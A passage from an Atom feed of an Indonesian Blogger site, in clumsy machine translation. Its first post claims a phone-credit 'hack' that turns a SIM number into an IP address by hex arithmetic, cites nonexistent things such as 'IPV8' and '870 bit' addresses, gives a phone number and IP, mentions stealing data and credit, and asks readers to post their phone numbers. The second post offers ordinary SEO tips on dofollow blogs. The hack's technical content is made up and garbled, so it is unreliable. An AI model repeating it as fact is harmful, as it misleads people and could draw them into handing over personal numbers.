6.6 jika di bagian 2 angka ini lebih 3 di jumlah kan dengan angka  asal 52.6" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;46 = 6.6 if in part 2 of  this figure is 3 in the amount of it with numbers from 52.6&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="35  = 5.5 nilai tetap" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;35 = 5.5 fixed value&lt;br /&gt;&lt;/span&gt;&lt;span title="26 = 4.6 nilai hasil belakang , tidak dipakai" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;26 = 4.6 return value  back, not used&lt;br /&gt;&lt;/span&gt;&lt;span title="43 + 10 = 53" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;43 + 10 = 53&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="hasil" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;results&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(255, 255, 255);" title="852.65.5453 dari hasil itu di jumlahkan membulat hingga tidak  lepas dari nilai lebih dari 1000 dan di hex ascii langsung" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;852.65.5453 than that in  total the result rounded up to not be separated from the value of more  than 1000 direct and in hex ascii&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="perhitungannya" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;calculation&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="852/2 = 426 hex 343236" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;852 / 2 = 426 343 236 hex&lt;br /&gt;&lt;/span&gt;&lt;span title="65/2 = 32.5 hex 33322E35" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;65 / 2 = 32.5 33322E35  hex&lt;br /&gt;&lt;/span&gt;&lt;span title="545/2 = 272,5 hex 3237322E35 angka pada 3 tidak  di ikutkan" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;545 / 2 = 272.5  3237322E35 hex digits in 3 not in the Include&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="bisa di peroleh 34 32 36 33 32 2E 35 32 37 32 2E  35 untuk menghasilkan IP address tetap membutuhkan perhitungan yang  panjang." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;can be obtained 34 32 36  33 32 2E 35 32 37 32 2E 35 to generate an IP address still requires a  long calculation.  &lt;/span&gt;&lt;span title="saya gambarkan saja karena sanga panjang sekali,  hasil hex di hitung mengunakan alogaritma dengan perhitungan IP address  milik modem HP." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;I describe it as a long  sanga, the hex is calculated using a calculation algorithm with HP  modem's IP address.  &lt;/span&gt;&lt;span title="semua di jumlahkan menjadi IP dengan 870 bit di  atas IPV8 itu masih di miliki oleh perusahaan Eropa saat ini yang masih  berkembang." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;All in totalizing the IP  with 870 bit above IPV8 it still is owned by European companies today  who are still developing.  &lt;/span&gt;&lt;span title="dengan sebutan 6G, angka 08 teller memakai  kombilasi hitungan alogaritma jauh lebih sulit dari pada mencari IPV6  dan angka 3 di belakang nomor urut" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;As 6G, 08 figures wearing  kombilasi teller count algorithm is much more difficult than looking  for IPV6 and number 3 in the back of the serial number &lt;/span&gt;&lt;span title="karena tertarlalu jauh maka di buat aja menjadi  pecahan 120 bit IPV4 perhitungannya anda harus belajar memahami kerja  IPV4 di bentuk berapa digital yang sama." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;because tertarlalu far  then made wrote a 120-bit floating calculations IPV4 you must learn to  understand how much work IPV4 in digital form the same.  &lt;/span&gt;&lt;span title="ini IP yang saya susun dari nomor Hp itu  sendiri." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;This IP that I collated  from Hp number itself.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="Nomor simacard : 085 646 352 643" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;Simacard number: 085 646  352 643&lt;br /&gt;&lt;/span&gt;&lt;span title="IP : 180.120.12.003 coba aja tes soalnya pulsa  nya udah habis sih ( yang pasti udah tidak aktif lagi)" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;IP: 180.120.12.003 just  try it test pulse because its already been hell (which would've no  longer active)&lt;br /&gt;&lt;/span&gt;&lt;span title="cara kirim cukup mudah anda hanya menggunakan  perintah CMD sederhana." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;fairly easy way to send  you only use a simple CMD command.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="urutan yang saya gunakan dalam mengirim atau  mengisi pulsa secara hack" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;sequence that I use in  sending or fill out a hack pulse&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="tes koneksi dulu." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;connection test first. &lt;/span&gt;&lt;span title="dengan cara ping 180.120.12.003 hasilnya no respon" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;180.120.12.003 ping  results by no response&lt;br /&gt;&lt;/span&gt;&lt;span title="lalu saya meng aktifkan nomor sim tersebut dan  akhirnya respon juga." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;then I switch to the sim  number and finally the response as well.  &lt;/span&gt;&lt;span title="lalu saya coba memakai router adder  180.120.12.003 2010 lalu hp saya hang terpaksa deh restrat hilang lagi  semua nomor dan juga video ini yang saya mau upload sebagai buktinya,  sedih deh...." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;then I tried to use the  router 180.120.12.003 adder 2010 and then had to hang my hp deh restrat  lost again all the numbers and also this video that I want uploaded as  proof of this, sadly deh .... &lt;/span&gt;&lt;span title="jadi gak ada bukti deh  buat apa ini trik bohongan atau tidak buat anda." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;so not there is evidence  of why this trick deh fake or not for you. &lt;/span&gt;&lt;span title="tetapi  jika anda tidak percaya silakan masukan komentar anda ke sini dengan  nomor hpnya saya jamin deh saya akan isi pulsa anda 9999999 tidak ada  habisnya, tetapi reskio harus restrat dulu alias membuat hang tuh hp  tetapi beneran saya jamin pulsa anda tidak akan habis sampai kapan pun," onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;but if you do not believe  please enter your comment here with a number hpnya deh I guarantee I'll  fill you 9999999 credits is endless, but risk are must first restrat  alias make hangs tu.. hp but my real credit guarantee you will not be out  until whenever, &lt;/span&gt;&lt;span title="yang pasti resikonnya itu yang  harus di hadapi." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;resikonnya it certainly  should be in the face.&lt;br /&gt;&lt;/span&gt;&lt;span title="tapi sekarang sudah tidak anda masalah lagi." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;but it's not your problem  anymore.&lt;br /&gt;&lt;/span&gt;&lt;span title="karena itu posting ini aku buat, sorrry semua  aku buat sensor karena takut menjadikan artikel ini sumber kejahatan." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;&lt;br /&gt;So this post I make, I  make sorrry all sensors for fear of making this article the source of  evil.&lt;br /&gt;&lt;/span&gt;&lt;span title="bisa mencuri data pribadi." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;can steal personal data.&lt;br /&gt;&lt;/span&gt;&lt;span title="mengirim virus" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;send a virus&lt;br /&gt;&lt;/span&gt;&lt;span title="mencuri pulsa" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;steal credit&lt;br /&gt;&lt;/span&gt;&lt;span title="dan banyak sekali kelebihan negatif lainnya." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;and many other negative  excess.&lt;br /&gt;&lt;/span&gt;&lt;span title="kalau kelebihan positif sih buat update sn pada  hp dan yang lebih seru lagi bisa sms gratis sama telepon gratis,  mengubah nomor hp anda lebih dari 1 nomor bisa 2 sampai berapa pun  tetapi tujuan asal tetap nomor asli." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;if positive excess sn  hell for updates on the hp and a more exciting again the same could free  sms free phone, change your phone number more than 1 number can be 2 to  any but the original goals remain the original numbers.&lt;br /&gt;&lt;/span&gt;&lt;span title="itu cara melakukan hack mencari IP hp asli anda,  jika ip tidak dinamis atau tidak tetap kelemahannya di saat hp restrat  atau di matikan IP akan beruba sendirinya." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;how to hack it to find  your real IP hp, if ip not dynamic or not remains weak in a while hp  restrat or turn off the IP will beruba itself.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title="jika anda mencari tahu soal ip bisa di baca  posting sebelumnya tentang IP." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;if you find out about the  ip can read previous posts about IP.&lt;br /&gt;&lt;/span&gt;&lt;span title="maunya artikel ini saya jual akhirnya tidak jadi  soalnya tidak ada versi demo untuk artikel ini" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;wants this article I  finally did not sell because there is no demo version for this article&lt;br /&gt;&lt;/span&gt;&lt;span title="Mau mencoba silakan saya bersedian untuk tes apa  nomor anda kuat sama hp anda atau tidak, hp saya saja memakai nexsia  tidak kuat, padahal itu saya coba memakai hp teman saya samsung camp  tidak terjadi apa-apa malahan mendapatkan pesan kata teman saya (berisi  pulsa anda" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;Want to try to please me  bersedian to test what you are strong numbers at your hp or not, I just  wear nexsia hp is not strong, when I try to use my friend's samsung hp  camp did not happen even get a message that says my friend (with your  credit &lt;/span&gt;&lt;span title="hang) pada hal teman saya memakai itu nomor  untuk menghubungi saya, buat telpon sekitar 5 jam lah dari 12.00 sampai  07.00 pulsa yang tetap 10.000 tidak anda perubahan sama sekali padahal  beda nomor AS sama XL kalau AS isi 10.000 untuk nelpon selama 5 jam  hitung saja sisanya" onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;hang) in the case of my  friends wear that number to contact me, make a phone call about 5 hours  is from 12:00 until 07:00 10 000 pulses are still not at all when you  change different AS numbers at XL if the U.S. content of 10,000 for  calling for 5 hours just count the remaining &lt;/span&gt;&lt;span title="berapa  tuh?." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;how's that?.&lt;br /&gt;&lt;/span&gt;&lt;span title="cuma itu bukti dari teman saya yang relah HPnya  dan pulsanya sebagai kucing percobaan saya." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;only that the evidence of  my friend who relah HPnya and pulse as my cat experiment. &lt;/span&gt;&lt;span title="toh berhasil." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;nonetheless managed.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: rgb(235, 239, 249);" title="Tunggu Posting Berikutnya Tentang Internet Gratis dengan IP  address milik sendiri." onmouseover="this.style.backgroundColor='#ebeff9'" onmouseout="this.style.backgroundColor='#fff'"&gt;Wait for the Next Post  About Free Internet with its own IP address.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1184009001283460594?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1184009001283460594/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2011/01/send-messages-from-internet-computers.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1184009001283460594'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1184009001283460594'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2011/01/send-messages-from-internet-computers.html' title='Send messages from Internet computers to Hp'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-7247500583123356299</id><published>2011-01-23T02:09:00.000-08:00</published><updated>2011-01-23T02:22:09.587-08:00</updated><title type='text'>Get from google pagerank</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nLUUYT3afN4/TTv_dmvrsHI/AAAAAAAAADI/747JCuTj8YI/s1600/google-page-rank.jpg"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 289px; height: 211px;" src="http://3.bp.blogspot.com/_nLUUYT3afN4/TTv_dmvrsHI/AAAAAAAAADI/747JCuTj8YI/s320/google-page-rank.jpg" alt="" id="BLOGGER_PHOTO_ID_5565322648628211826" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span id="result_box" class="long_text" lang="en"&gt;&lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;&lt;br /&gt;To get&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;an&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;easy&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;page&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;rank&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;google&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;I&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;have&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;2&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;tips&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;are&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;pretty&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;easy&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;for&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;to do&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;namely&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;1&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Change&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your Blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Being&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Dofollow&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Nofollow&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Blog&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Dofollow&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blogs&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;are preferred&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;by&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;google&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;if&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;preferred,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;then&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;an opportunity&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;high&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pagerank&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is also greater&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;For&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;you&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;should&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;change&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;into&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;dofollow&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blog&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the way he is&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;:&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;a.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Login&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;your&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blogger dashboard&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;b.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Choose a&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;design&lt;/span&gt;&lt;span title="Klik untuk terjemahan alternatif" class="atn"&gt;-&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;edit&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;html&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;then&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;select&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;expand&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;widget&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;templates&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;c.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Press&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;ctrl&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;+&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;f&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;then&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;search for&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the word&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps atn"&gt;"&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;NOFOLLOW&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;"&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;d.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Change&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;all&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;words&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;the template&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;into  dofollow&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;nofollow&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;e.&lt;/span&gt; &lt;span title="Klik untuk terjemahan  alternatif" class="hps"&gt;Completed&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;Your&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;blog&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;will&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;turn&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;into&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;a&lt;/span&gt; &lt;span title="Klik untuk  terjemahan alternatif" class="hps"&gt;dofollow&lt;/span&gt; &lt;span title="Klik  untuk terjemahan alternatif" class="hps"&gt;blog&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;2&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Get&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Backlinks&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;High&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;PageRank&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Blogs&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;premises&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;by&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Commenting&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Although&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;time-consuming&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;enough&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;but&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is also&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;very&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;effective&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;way&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;to&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;increase&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pagerank&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;from&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Google&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Do&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;activities&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;walking&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;regularly&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;and&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;FORGET&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;comments&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;on&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;blogs&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;that&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;have&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;high&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;pagerank&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;So&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;first&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;of&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;my&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;tips&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;good luck&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;br /&gt;&lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;Please&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;share&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;in the comments&lt;/span&gt;  &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;below&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;,&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;this blog&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;is&lt;/span&gt; &lt;span title="Klik untuk terjemahan alternatif" class="hps"&gt;DoFollow&lt;/span&gt;&lt;span class="" title="Klik untuk terjemahan alternatif"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' 